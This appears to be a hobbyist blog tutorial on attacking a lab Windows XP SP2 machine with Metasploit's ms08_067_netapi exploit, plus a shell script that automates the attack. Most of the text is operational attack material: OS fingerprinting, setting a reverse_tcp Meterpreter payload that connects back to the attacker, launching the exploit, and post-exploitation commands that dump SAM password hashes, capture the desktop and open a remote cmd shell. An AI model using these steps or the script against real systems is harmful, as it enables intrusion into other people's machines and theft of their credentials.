This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.
So, first off, I set up a vulnerable XP SP2 box, the vulnerability being that Microsoft made it, teehee!
Then I used BackTrack 4 with Metasploit installed to use the ms08_067_netapi exploit.
Firstly update the framework:
cd /pentest/exploits/framework3
svn up
Once this has finished, type cd on its own to get back to root's home directory:
nmap -O 192.168.0.1 (OS fingerprint: point this at the victim's address so you know you are looking at an XP box before you fire the exploit)
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127 (this is the victim's I.P.)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (I.P. of your PC, the address the reverse shell will connect back to)
show options (confirm RHOST, LHOST and LPORT are all filled in; LPORT defaults to 4444)
exploit (this runs the exploit)
If all went well you should have a Meterpreter shell open. Two things worth knowing: the exploit goes over SMB, so TCP 445 on the victim has to be reachable, and the XP SP2 Windows Firewall is on by default and blocks 445 unless File and Printer Sharing is allowed through it; and the module supports the check command, so you can run check before exploit to see whether the box looks vulnerable without crashing the Server service on a patched host.
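To make the run repeatable rather than retyping each line, here is an added example (my own, not from the original post) that wraps the msfconsole steps above into a resource script and launches it with msfconsole -r. It assumes the BackTrack 4 path /pentest/exploits/framework3 (overridable through MSF_DIR), the default LPORT of 4444, and that you pass the victim's address first and your own second; the IPv4 check is only a typo guard so the exploit is not pointed at the wrong box, not a reachability test.

```shell
#!/bin/sh
# Added example, not from the original post: drives the ms08_067_netapi steps
# through a msfconsole resource script. Paths and addresses are assumptions.
set -eu

# BackTrack 4 Metasploit location (assumed); override with MSF_DIR=... if yours differs.
MSF_DIR="${MSF_DIR:-/pentest/exploits/framework3}"

# Basic dotted-quad sanity check: four octets, digits only, each 0-255.
valid_ipv4() {
    _ip=$1
    case $_ip in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;   # stray characters or empty octets
    esac
    _oldifs=$IFS; IFS=.
    set -- $_ip                             # split on dots into $1..$n
    IFS=$_oldifs
    [ $# -eq 4 ] || return 1
    for _o in "$@"; do
        [ "$_o" -le 255 ] || return 1
    done
    return 0
}

# Emit the resource script on stdout: RHOST, LHOST, optional LPORT (default 4444).
# 'check' runs before 'exploit' so the console shows the module's opinion first.
build_rc() {
    rhost=$1; lhost=$2; lport=${3:-4444}
    valid_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $rhost
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
check
exploit
EOF
}

# Write the script to a temp file and hand it to msfconsole.
run_exploit() {
    rc=$(mktemp)
    build_rc "$@" > "$rc"
    cd "$MSF_DIR" && ./msfconsole -r "$rc"
}

# Usage: sh ms08_067.sh <victim IP> <your IP> [LPORT]
# Only launches when both addresses are given, so sourcing the file is harmless.
if [ "$#" -ge 2 ]; then
    run_exploit "$@"
fi
```

Resource scripts are plain msfconsole command lists, so anything you would type at the prompt can go into build_rc; keep in mind that a failed check does not stop the following exploit line, so read the check output before letting it run if the target is not yours to break.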
I then used some of the commands within the Meterpreter to see how good it was!
sysinfo (OS version and hostname of the victim)
ipconfig (the victim's network interfaces)
help (lists everything the session can do)
hashdump (dumps the local SAM password hashes; this works straight away because the exploited Server service runs as SYSTEM)
screenshot (grabs the victim's desktop)
shell (drops you into a cmd.exe on the box)